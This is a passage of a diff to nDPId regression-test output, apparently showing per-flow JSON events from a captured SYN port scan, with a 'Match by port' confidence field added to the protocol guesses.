+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00598{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","ndpi": {"proto":"AJP","breed":"Acceptable","category":"Web"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5010,17 +5010,17 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","ndpi": {"proto":"RTMP","breed":"Acceptable","category":"Media"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTMP","breed":"Acceptable","category":"Media"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","ndpi": {"proto":"RTMP","breed":"Acceptable","category":"Media"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTMP","breed":"Acceptable","category":"Media"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5164,13 +5164,13 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","ndpi": {"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","ndpi": {"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
